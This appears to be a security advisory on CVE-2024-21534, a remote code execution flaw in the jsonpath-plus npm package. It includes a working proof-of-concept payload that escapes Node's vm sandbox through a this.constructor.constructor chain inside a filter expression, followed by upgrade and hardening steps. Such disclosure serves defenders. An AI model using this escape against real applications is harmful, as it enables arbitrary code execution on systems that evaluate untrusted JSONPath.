---

A critical vulnerability, CVE-2024-21534, has been reported in the popular jsonpath-plus package and affects versions before 10.0.7. It is a Remote Code Execution (RCE) flaw caused by improper input sanitization of JSONPath expressions: an attacker who can supply the path being evaluated can execute arbitrary code in the process that evaluates it.

The Vulnerability

Specifically, the vulnerability lies in the library's default use of the Node.js vm module to run the JavaScript inside JSONPath filter and script expressions ([?(...)] and [(...)]). The vm module is documented by Node.js as not being a security mechanism: code run in a "new context" can still reach objects from the host realm and, through them, the host process. Versions of jsonpath-plus before 10.0.7 are affected.

An earlier fix was attempted in version 10.0.0, but it was found that the vulnerability could still be exploited using different payloads, so 10.0.7 is the first release that addresses it.

Exploit Details

An attacker who controls a JSONPath expression (for example, in an application that accepts a path from a request and evaluates it against a document) can place JavaScript inside a filter expression. Because the library hands that expression to the vm module, the code can escape the vm context with the well-known this.constructor.constructor("return process")() chain (the sandbox object belongs to the host realm, so its constructor chain leads to the host's Function constructor) and then call anything in the host process. Here's a sample payload that demonstrates how this vulnerability can be exploited on a vulnerable version:

const { JSONPath } = require("jsonpath-plus");

// Any document with at least one member will do: the filter body is
// evaluated once per member of the node it is applied to.
const json = { a: 1 };

// Attacker-controlled JSONPath. The filter body ignores the document and
// escapes the vm context through the sandbox object, which belongs to the
// host realm: this.constructor.constructor is the host's Function
// constructor, so it can hand back any host global, here console.
const payload =
  '$[?(this.constructor.constructor("return console")().log("Uh-oh! RCE"))]';

// RCE happens here, while the filter expression is evaluated
const badJson = JSONPath({ path: payload, json });

console.log(badJson);

When this code is executed against a vulnerable version, the host process prints

Uh-oh! RCE
[]

The first line is written by the host's own console.log, called from inside the filter; the second is the filter's result (the injected call returns undefined, so no member matches). This demonstrates that an attacker who controls the JSONPath expression can indeed execute arbitrary code in the affected application's process.

Original References

For a more comprehensive overview of this vulnerability and the discussion surrounding the fix, you can refer to the following links:

- CVE-2024-21534: The original report of the vulnerability on GitHub.
- Version 10.0.0 Fix: The initial attempt at fixing the vulnerability.
- Different Payloads Exploiting the Vulnerability: A discussion highlighting that the vulnerability could still be exploited using other payloads.

How to Protect Yourself

To safeguard your applications from this critical RCE vulnerability, upgrade jsonpath-plus to 10.0.7 or later, which addresses the issue. You can do this by running:

npm install jsonpath-plus@latest

Because jsonpath-plus is frequently pulled in as a transitive dependency, also check which versions are actually installed and which packages depend on them:

npm ls jsonpath-plus

If a dependency pins an older release, the "overrides" field in package.json can force the patched version until the upstream package updates. In addition, if your application never needs filter or script expressions, pass eval: false in the JSONPath options so that the library refuses to evaluate them at all, and treat any JSONPath expression that arrives from an untrusted source as code rather than data.

Stay vigilant and keep your dependencies up-to-date to protect your applications and systems from CVE-2024-21534 and similar vulnerabilities.

Timeline

Published on: 10/11/2024 13:15:15 UTC
Last modified on: 10/20/2024 12:15:02 UTC